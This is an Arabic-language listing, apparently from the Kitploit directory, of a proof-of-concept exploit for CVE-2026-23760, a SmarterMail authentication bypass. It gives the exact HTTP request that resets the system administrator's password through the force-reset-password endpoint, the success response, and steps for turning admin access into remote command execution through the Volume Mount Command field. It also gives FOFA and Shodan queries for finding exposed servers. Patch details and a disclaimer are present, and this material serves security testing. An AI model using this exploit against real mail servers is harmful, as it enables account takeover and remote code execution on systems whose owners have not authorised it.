Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
smartermail-CVE-2026-23760-poc — CVE-2026-23760 - تجاوز المصادقة عبر واجهة برمجة تطبيقات إعادة تعيين كلمة المرور في SmarterMail. | Kitploit
أدوات/GitHubGitHub/maxmnml/smartermail-cve-2026-23760-poc
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubmaxmnml/smartermail-cve-2026-23760-poc

smartermail-CVE-2026-23760-poc

CVE-2026-23760 - تجاوز المصادقة عبر واجهة برمجة تطبيقات إعادة تعيين كلمة المرور في SmarterMail.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
8215منذ 8 أشهرلم تتم المراجعة بعد

SmarterMail-CVE-2026-23760-poc

إثبات مفهوم يستغل تجاوز المصادقة عبر واجهة برمجة تطبيقات إعادة تعيين كلمة المرور لحساب مسؤول نظام SmaretMail.

الثغرة الأمنية

توجد الثغرة بسبب خلل في تجاوز المصادقة في واجهة برمجة تطبيقات إعادة تعيين كلمة المرور. تسمح نقطة النهاية force-reset-password بالطلبات المجهولة ولا تتحقق من كلمة المرور الحالية أو رمز إعادة التعيين عند إعادة تعيين حسابات مسؤول النظام.

  • الاستيلاء على حساب مسؤول النظام.
  • مسار مباشر لتنفيذ التعليمات البرمجية عن بُعد عبر الوظائف المدمجة في SmarterMail.

الإصدارات المتأثرة

  • إصدارات SmarterTools SmarterMail الأقدم من البناء 9511

إثبات المفهوم (بواسطة watchtowr labs)

إثبات المفهوم بسيط كما يلي:

POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145

{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}

يجب أن تتلقى الاستجابة التالية، والتي تؤكد أن كلمة المرور تم تعديلها بنجاح:

{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}

الشرط المتبقي الوحيد هو معرفة اسم المستخدم لحساب المسؤول.

من الاستيلاء على حساب المسؤول إلى تنفيذ التعليمات البرمجية وما بعده

بمجرد المصادقة كمسؤول نظام، يمكن للمهاجم:

  • الانتقال إلى Settings -> Volume Mounts.
  • إنشاء وحدة تخزين جديدة.
  • توفير أمر تعسفي في حقل Volume Mount Command.

يتم تنفيذ هذا الأمر بواسطة نظام التشغيل الأساسي. عند هذه النقطة، يحقق المهاجم تنفيذًا كاملاً للتعليمات البرمجية عن بُعد على المضيف.

عند حفظ التكوين، يتم تنفيذ الأمر المقدم فورًا.

الأتمتة

قالب Nuclei:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml

في البرية

FOFA:

title='SmarterMail'

SHODAN:

html:'SmarterMail'

التأثير

يمكن لمهاجم عن بُعد غير مصادق تجاوز المصادقة لحساب مسؤول النظام والحصول على الوصول. بمجرد المصادقة، يمكنهم إكمال تنفيذ تعليمات برمجية كامل عن بُعد على المضيف.

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:حرج

المعالجة والتخفيف

قم بالتحديث إلى أحدث إصدار: https://www.smartertools.com/smartermail/downloads

  • البناء 9511 (15 يناير 2026)
  • البناء 9518 (22 يناير 2026)

المراجع

  • ملاحظات إصدار SmarterMail
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760
  • مدونة watchTowr وإثبات المفهوم

إخلاء مسؤولية

هذه الأداة مخصصة لاختبار الأمان المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

تنزيل الأداة